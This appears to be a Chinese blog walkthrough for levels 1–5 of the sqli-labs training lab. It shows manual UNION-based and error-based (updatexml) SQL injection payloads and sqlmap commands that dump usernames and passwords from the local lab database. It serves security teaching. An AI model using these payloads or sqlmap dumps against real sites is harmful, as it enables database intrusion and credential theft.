sqli-labs(1-5)通关讲解

sqli-labs(1-5)通关讲解

Less-1

方法一:手工注入

1.判断闭合

http://localhost/sqli-labs/Less-1/?id=1' and 1=1 --+  //正常
http://localhost/sqli-labs/Less-1/?id=1' and 1=2 --+  //异常

image-20240722183932144

image-20240722183913207

2.判断字段数

http://localhost/sqli-labs/Less-1/?id=1' order by 3 --+  //正常
http://localhost/sqli-labs/Less-1/?id=1' order by 4 --+  //异常

image-20240722184041492

image-20240722184049926

有四个字段

3.查看回显点

http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,3 --+

image-20240722184355116

4.查看数据库

http://localhost/sqli-labs/Less-1/?id=-1' union select 1,database(),3 --+

image-20240722184425097

5.查看表

http://localhost/sqli-labs/Less-1/?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema="security"),3 --+

image-20240722184631662

6.查看users表中列

http://localhost/sqli-labs/Less-1/?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"),3 --+

image-20240722184714357

7.查看users表中username,password的数据

http://localhost/sqli-labs/Less-1/?id=-1' union select 1,(select group_concat(username,0x7e,password) from users),3 --+

image-20240722184830799

方法二:工具注入

1.通过sqlmap工具查看库

python3 sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --batch --dbs

image-20240722185035824

查看当前数据库

python3 sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --batch --current-db

image-20240722185730139

2.查看security中的表

python3 sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --batch --tables -D security

image-20240722185522162

3.查看users数据

python3 sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --batch --dump -D security -T users

image-20240722185444838

Less-2

第二关为数字型注入,与第一关做法相同

方法一:手工注入

1.判断闭合

http://localhost/sqli-labs/Less-2/?id=1 and 1=1 --+  //正常
http://localhost/sqli-labs/Less-2/?id=1 and 1=2 --+  //异常

image-20240722190020312

image-20240722190027603

其余步骤与Less-1步骤一样,这里不做重复说明了

方法二:工具注入

与Less-1方法相同

python3 sqlmap.py -u "http://localhost/sqli-labs/Less-2/?id=1" --batch --dump -D security -T users

image-20240722190300358

Less-3

方法一:手工注入

1.判断闭合

http://localhost/sqli-labs/Less-3/?id=1') and 1=1 --+  //正常
http://localhost/sqli-labs/Less-3/?id=1') and 1=2 --+  //异常

image-20240722190615717

image-20240722190623179

2.判断字段数

http://localhost/sqli-labs/Less-3/?id=1') order by 3 --+
http://localhost/sqli-labs/Less-3/?id=1') order by 4 --+

image-20240722190740763

image-20240722190748874

3.查看回显点

http://localhost/sqli-labs/Less-3/?id=-1') union select 1,2,3 --+

image-20240722190814793

4.查看数据库

http://localhost/sqli-labs/Less-3/?id=-1') union select 1,database(),3 --+

image-20240722190838860

5.查看表

http://localhost/sqli-labs/Less-3/?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

image-20240722191003222

6.查看users表中字段

http://localhost/sqli-labs/Less-3/?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name="users" --+

image-20240722191108305

7.查看users表中数据

http://localhost/sqli-labs/Less-3/?id=-1') union select 1,group_concat(username,0x7e,password),3 from users --+

image-20240722191208699

方法二:工具注入

python3 sqlmap.py -u "http://localhost/sqli-labs/Less-3/?id=1" --batch -D security -T users --dump

image-20240722191407644

Less-4

方法一:手工注入

http://localhost/sqli-labs/Less-4/?id=1") and 1=1 --+  //正常
http://localhost/sqli-labs/Less-4/?id=1") and 1=2 --+  //异常

image-20240722191556487

image-20240722191603817

后面跟前三关步骤一样,参考Less-1和Less-2即可

方法二:工具注入

python3 sqlmap.py -u "http://localhost/sqli-labs/Less-4/?id=1" --batch -D security -T users --dump

image-20240722191758791

Less-5

方法一:手工注入

1.判断闭合

http://localhost/sqli-labs/Less-5/?id=1' and 1=1 --+  //正常
http://localhost/sqli-labs/Less-5/?id=1' and 1=2 --+  //异常

image-20240722191949991

image-20240722191959325

2.判断字段数

http://localhost/sqli-labs/Less-5/?id=1' order by 4 --+ //异常
http://localhost/sqli-labs/Less-5/?id=1' order by 3 --+ //正常

可判断3字段

3.判断回显点

image-20240722192143242

因为没有回显点我们可试一下报错注入

4.报错注入–查数据库

http://localhost/sqli-labs/Less-5/?id=-1' and updatexml(1,concat(0x7e,database()),3)--+

image-20240722192356943

5.查表

http://localhost/sqli-labs/Less-5/?id=-1' and updatexml(1,concat(0x7e,((select group_concat(table_name) from information_schema.tables where table_schema="security") )),3)--+

image-20240722192513574

6.查users中的列名

http://localhost/sqli-labs/Less-5/?id=-1' and updatexml(1,concat(0x7e,((select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users") )),3)--+

image-20240722192602212

7.查users中username,password中数据

http://localhost/sqli-labs/Less-5/?id=-1' and updatexml(1,concat(0x7e,((select group_concat(username,0x7e,password) from users) )),3)--+

image-20240722192708912

可通过限制查询–limit 来逐一查看每组数据

方法二:工具注入

通过sqlmap可直接查出users表中数据至于具体操作可参照Less-1

python3 sqlmap.py -u "http://localhost/sqli-labs/Less-5/?id=1" --batch -D security -T users --dump

image-20240722192936349

ps:后续教程会持续发布,尽情期待

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值